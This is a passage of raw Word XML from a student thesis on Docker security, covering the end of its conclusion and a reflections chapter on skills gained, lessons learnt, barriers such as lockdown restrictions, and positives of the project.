      <w:r w:rsidR="00430AE1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve"> Finally, further research on this or related topics, specifically of Docker security</w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve"> would be essential and </w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t>boon to the Dev ops and engineers</w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00225A5F">
        <w:t xml:space="preserve">as it is a recent technology and needs </w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t>supplementary studies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDFF60" w14:textId="476AF06C" w:rsidR="00125B77" w:rsidRDefault="00125B77" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="6C964476" w14:textId="5BCD4BEA" w:rsidR="00125B77" w:rsidRDefault="00125B77" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="6DE64352" w14:textId="77777777" w:rsidR="00125B77" w:rsidRDefault="00125B77" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="5D718D09" w14:textId="630234AA" w:rsidR="009719B1" w:rsidRDefault="0095526E" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="_Toc87032952"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t xml:space="preserve"> REFLECTIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w14:paraId="66AB5125" w14:textId="4CBC36BE" w:rsidR="00D12660" w:rsidRDefault="00D12660" w:rsidP="00D12660">
      <w:r>
        <w:t xml:space="preserve">The research was </w:t>
      </w:r>
      <w:r w:rsidR="00192DCD">
        <w:t xml:space="preserve">conducted using </w:t>
      </w:r>
      <w:r>
        <w:t>a wide variety of method</w:t>
      </w:r>
      <w:r w:rsidR="00192DCD">
        <w:t>ological and scientific approaches to solv</w:t>
      </w:r>
      <w:r w:rsidR="0067584A">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00192DCD">
        <w:t xml:space="preserve"> the research question</w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t xml:space="preserve"> discussed in section 5.1.</w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t xml:space="preserve"> As shown in the report,</w:t>
      </w:r>
      <w:r w:rsidR="00024158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00024158">
        <w:t xml:space="preserve">overall </w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t>objectives</w:t>
      </w:r>
      <w:r w:rsidR="00024158">
        <w:t xml:space="preserve"> and aims</w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t xml:space="preserve"> established for this project were accomplished </w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t>success</w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t xml:space="preserve"> Throughout the project, the author faced many challenges and obstacles to reach </w:t>
      </w:r>
      <w:r w:rsidR="00154E6A">
        <w:t>the project’s</w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t xml:space="preserve"> goals </w:t>
      </w:r>
      <w:r w:rsidR="008906D2">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t xml:space="preserve">had learnt </w:t>
      </w:r>
      <w:r w:rsidR="00154E6A">
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t>beneficial lessons.</w:t>
      </w:r>
      <w:r w:rsidR="00270730">
        <w:t xml:space="preserve"> The author had </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>limited</w:t>
      </w:r>
      <w:r w:rsidR="00270730">
        <w:t xml:space="preserve"> knowledge </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00270730">
        <w:t xml:space="preserve"> Docker systems as it is a recent technology</w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve">. Besides, the research requires </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>excellent</w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve"> technical knowledge and understanding of Linux OS. </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve">he author conducted extensive research and study on the internet about </w:t>
      </w:r>
      <w:r w:rsidR="00D35231">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve">Docker and </w:t>
      </w:r>
      <w:r w:rsidR="00D35231">
        <w:t>Linux technologies</w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="008555D3">
        <w:t>guide and assist with the implementation and design of the attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00FC23FC">
        <w:t xml:space="preserve"> The thesis</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve">’s design was organised </w:t>
      </w:r>
      <w:r w:rsidR="00C46F67">
        <w:t>in a way that is</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve"> sequential</w:t>
      </w:r>
      <w:r w:rsidR="001A12B9">
        <w:t>ly linear</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA5F3F">
        <w:t>approach</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve"> to make </w:t>
      </w:r>
      <w:r w:rsidR="000E0B1F">
        <w:t>it academic and professional.</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68548906" w14:textId="6251A12E" w:rsidR="00C46F67" w:rsidRDefault="00C46F67" w:rsidP="00D12660">
      <w:r>
        <w:t>Throughout this thesis</w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve"> the author has gained and acquired </w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t xml:space="preserve">many </w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve">skills </w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t xml:space="preserve">and bits of knowledge, </w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t>particular</w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t>field</w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve"> of Docker security and systems.</w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t xml:space="preserve"> Some of the skills learned and developed are listed below</w:t>
      </w:r>
      <w:r w:rsidR="005B23E4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A14D3B" w14:textId="237CCFE7" w:rsidR="005B23E4" w:rsidRDefault="005B23E4" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Time management:</w:t>
      </w:r>
      <w:r w:rsidR="002447D8">
        <w:t xml:space="preserve"> the author has layout well-ordered tasks and activities </w:t>
      </w:r>
      <w:r w:rsidR="005769D4">
        <w:t>to be fulfilled within a packed schedule to attain the objectives of this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355091A1" w14:textId="7CEE23FC" w:rsidR="005769D4" w:rsidRDefault="002248CD" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Project management: utilising a Gantt chart to organise</w:t>
      </w:r>
      <w:r w:rsidR="003C3329">
        <w:t xml:space="preserve"> and follow</w:t>
      </w:r>
      <w:r w:rsidR="00641CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C3329">
        <w:t>up the project’s progress</w:t>
      </w:r>
      <w:r w:rsidR="00A21C66">
        <w:t xml:space="preserve"> has helped the author </w:t>
      </w:r>
      <w:r w:rsidR="00641CFC">
        <w:t>deliver the project within the given time frame with minimum stress level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E76C06" w14:textId="76190C84" w:rsidR="008F222E" w:rsidRDefault="008F222E" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Working under pressure: </w:t>
      </w:r>
      <w:r w:rsidR="009D36A2">
        <w:t xml:space="preserve">family life, work combined with other modules to deliver was </w:t>
      </w:r>
      <w:r w:rsidR="00221ED6">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009D36A2">
        <w:t>difficult task. On top of that</w:t>
      </w:r>
      <w:r w:rsidR="00221ED6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009D36A2">
        <w:t xml:space="preserve"> the thesis was allocated </w:t>
      </w:r>
      <w:r w:rsidR="00221ED6">
        <w:t>to three months only. However, the author managed to balance the progress effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0209B5" w14:textId="6B61A438" w:rsidR="00221ED6" w:rsidRDefault="00B517EB" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Contingency planning: identifying the potential risks that could occur during the development of this project using risk management techniques ha</w:t>
      </w:r>
      <w:r w:rsidR="00651A25">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> helped the author</w:t>
      </w:r>
      <w:r w:rsidR="001636BB">
        <w:t xml:space="preserve"> resume the project when the gns3 software crashed.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5DFE6" w14:textId="55D3EA9B" w:rsidR="00651A25" w:rsidRDefault="008814AF" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Schedule and prioritise tasks: each </w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve">task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D40472">
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve"> essential to the project’s success; however, they were scheduled and arranged based on importance, urgency and complexity, given more time to the </w:t>
      </w:r>
      <w:r w:rsidR="00D40472">
        <w:t>testing and experimenting</w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve"> section. Th</w:t>
      </w:r>
      <w:r w:rsidR="004C2F14">
        <w:t>is way</w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve">, the author has </w:t>
      </w:r>
      <w:r w:rsidR="009B3A89">
        <w:t>benefited from prioritising tasks</w:t>
      </w:r>
      <w:r w:rsidR="004C2F14">
        <w:t xml:space="preserve"> and learnt how to schedule tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576E5F1" w14:textId="25B6176C" w:rsidR="004C2F14" w:rsidRDefault="004C2F14" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AD59CF" w14:textId="765B304A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23587BC6" w14:textId="77777777" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1727F1" w14:textId="2D602206" w:rsidR="004C2F14" w:rsidRDefault="004C2F14" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C2F14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lessons learnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0600FE" w14:textId="15507868" w:rsidR="004C2F14" w:rsidRDefault="001611E8" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scheduling and dividing tasks into smaller subsections to manage and simplify the work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27E29B" w14:textId="3A5ECCB3" w:rsidR="001611E8" w:rsidRDefault="003909CF" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How to schedule and pr</w:t>
      </w:r>
      <w:r w:rsidR="00D376A9">
        <w:t>ioritise tasks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DFD29B" w14:textId="25664AA4" w:rsidR="00D376A9" w:rsidRDefault="00D376A9" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Planning and identifying the risks ahead </w:t>
      </w:r>
      <w:r w:rsidR="005131DE">
        <w:t xml:space="preserve">makes </w:t>
      </w:r>
      <w:r w:rsidR="00E22A65">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="005131DE">
        <w:t xml:space="preserve">significant difference to any project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97249A" w14:textId="66CF5E4F" w:rsidR="005131DE" w:rsidRDefault="005131DE" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To be committed to the schedules</w:t>
      </w:r>
      <w:r w:rsidR="00E22A65">
        <w:t xml:space="preserve"> and how to stay motivated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61E91F" w14:textId="70B7CD9F" w:rsidR="00E22A65" w:rsidRDefault="00E22A65" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How to accomplish the aims and objectives of a project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565843C9" w14:textId="64EC0412" w:rsidR="00E22A65" w:rsidRDefault="00E22A65" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How</w:t>
      </w:r>
      <w:r w:rsidR="004565F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A00D44">
        <w:t>to identify the potential risks</w:t>
      </w:r>
      <w:r w:rsidR="004565F2">
        <w:t xml:space="preserve"> and apply contingency planning during the development of a project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB904B" w14:textId="1E6AE342" w:rsidR="0008759F" w:rsidRDefault="004565F2" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create multiple back up </w:t>
      </w:r>
      <w:r w:rsidR="0008759F">
        <w:t>locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="002D674B">
        <w:t xml:space="preserve">document and </w:t>
      </w:r>
      <w:r>
        <w:t>save the works regularly</w:t>
      </w:r>
      <w:r w:rsidR="0008759F">
        <w:t xml:space="preserve"> and to avoid data loss</w:t>
      </w:r>
      <w:r w:rsidR="002D674B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D21F0" w14:textId="77777777" w:rsidR="00061A8B" w:rsidRDefault="00061A8B" w:rsidP="00061A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1817BB90" w14:textId="5D074090" w:rsidR="0008759F" w:rsidRDefault="0008759F" w:rsidP="0008759F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008759F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Things that could have been done differently</w:t>
      </w:r>
      <w:r w:rsidR="004565F2" w:rsidRPr="0008759F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44B2CB" w14:textId="0C2A9768" w:rsidR="00061A8B" w:rsidRDefault="00061A8B" w:rsidP="0008759F">
      <w:r>
        <w:t xml:space="preserve">Finding the right topic </w:t>
      </w:r>
      <w:r w:rsidR="00385F27">
        <w:t xml:space="preserve">coupled with other modules has led to starting the project late than </w:t>
      </w:r>
      <w:r w:rsidR="00606F02">
        <w:t>expected. Although the author managed to quickly recover on track to finish the project, the project could have been started earlier to produce quality work and avoid frustration and stress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF30D8" w14:textId="3291F724" w:rsidR="008B1D23" w:rsidRDefault="008B1D23" w:rsidP="0008759F">
      <w:r>
        <w:t xml:space="preserve">The research topic </w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t xml:space="preserve">is a recent technology and </w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t>demands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in-depth technical skills and knowledge of Docker, Linux, and scripting</w:t>
      </w:r>
      <w:r w:rsidR="007E20BF">
        <w:t xml:space="preserve"> languages</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D15459">
        <w:t>Although the author could have referred to experienced people for better knowledge and outcome, a</w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t>ny technical issues</w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t xml:space="preserve"> faced were resolved</w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidR="00D918A3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t>research and self-</w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t>learning approach</w:t>
      </w:r>
      <w:r w:rsidR="00D15459">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FA650" w14:textId="1A199C28" w:rsidR="0096369A" w:rsidRDefault="0096369A" w:rsidP="0008759F">
      <w:r>
        <w:t xml:space="preserve">The implementation section should have been allocated adequate time as it was </w:t>
      </w:r>
      <w:r w:rsidR="008B1D23">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">complicated </w:t>
      </w:r>
      <w:r w:rsidR="008B1D23">
        <w:t xml:space="preserve">and challenging </w:t>
      </w:r>
      <w:r>
        <w:t>task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63886E1D" w14:textId="07DF9FF5" w:rsidR="00D15459" w:rsidRDefault="00D15459" w:rsidP="0008759F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15459">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Barriers experienced during this project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29083C9E" w14:textId="6EE48177" w:rsidR="00D15459" w:rsidRDefault="00D15459" w:rsidP="0008759F">
      <w:r>
        <w:t>Some of the obstacles that the author faced throughout the project are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47AC10" w14:textId="603F0B4F" w:rsidR="00D15459" w:rsidRDefault="00D15459" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The time allocated was insufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1C0EB" w14:textId="7075D052" w:rsidR="00A84713" w:rsidRDefault="00A84713" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time management was </w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>a complex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>issue due to workload from other modules and family responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27366891" w14:textId="23DFFD37" w:rsidR="00101BD4" w:rsidRDefault="00F6531A" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inadequate</w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E20BF">
        <w:t xml:space="preserve">skills </w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>of Linux and scripting languages, specifically with creating Docker images</w:t>
      </w:r>
      <w:r w:rsidR="006B1645">
        <w:t>, was challenging</w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68415019" w14:textId="429571A2" w:rsidR="00101BD4" w:rsidRDefault="007E20BF" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Insufficient research papers o</w:t>
      </w:r>
      <w:r w:rsidR="006B1645">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the topic as it is </w:t>
      </w:r>
      <w:r w:rsidR="00304CB9">
        <w:t xml:space="preserve">a new technology. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00304CB9">
        <w:t>In particular, finding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00304CB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B1645">
        <w:t>pragmatically based papers related to Docker security was difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5BD0D0" w14:textId="333C8D43" w:rsidR="00922EAC" w:rsidRPr="00D73FAF" w:rsidRDefault="00D933B0" w:rsidP="00922EAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access to university resources and facilities w</w:t>
      </w:r>
      <w:r w:rsidR="00D73FAF">
        <w:t>ere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restricted due to </w:t>
      </w:r>
      <w:r w:rsidR="00D73FAF">
        <w:t>nationwide lockdown because of the coronavirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68522E" w14:textId="3938EDC8" w:rsidR="006B1645" w:rsidRDefault="00922EAC" w:rsidP="00922EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922EAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806D9A9" w14:textId="7ED962CE" w:rsidR="00922EAC" w:rsidRDefault="00922EAC" w:rsidP="00922EAC">
      <w:r>
        <w:t xml:space="preserve">The author has </w:t>
      </w:r>
      <w:r w:rsidR="00431A81">
        <w:t>acquired</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00431A81">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00894266">
        <w:t xml:space="preserve">wide range </w:t>
      </w:r>
      <w:r w:rsidR="00431A81">
        <w:t xml:space="preserve">of new skills and </w:t>
      </w:r>
      <w:r w:rsidR="00471B20">
        <w:t xml:space="preserve">enriched his knowledge </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00471B20">
        <w:t>in the area of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00471B20">
        <w:t xml:space="preserve"> cloud containerisation technologies, especially of Docker systems and security</w:t>
      </w:r>
      <w:r w:rsidR="001A3F70">
        <w:t>. Some of the positive aspects of the project are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B084B9" w14:textId="57313899" w:rsidR="001A3F70" w:rsidRDefault="00003F88" w:rsidP="001A3F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Good t</w:t>
      </w:r>
      <w:r w:rsidR="001A3F70">
        <w:t xml:space="preserve">ime management and </w:t>
      </w:r>
      <w:r>
        <w:t>effective planning were the main factors to the success of this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16553C59" w14:textId="78CCDBC0" w:rsidR="00462136" w:rsidRDefault="0083013B" w:rsidP="001A3F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The consultation, </w:t>
      </w:r>
      <w:r w:rsidR="00334099">
        <w:t>guidance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and motivation given by the project supervisor have </w:t>
      </w:r>
      <w:r w:rsidR="00334099">
        <w:t>assisted the author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F4EF9">
        <w:t>to prompt well-structured and professional work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32117A4B" w14:textId="4935AA3F" w:rsidR="00D73FAF" w:rsidRPr="00922EAC" w:rsidRDefault="00334099" w:rsidP="00D73FAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
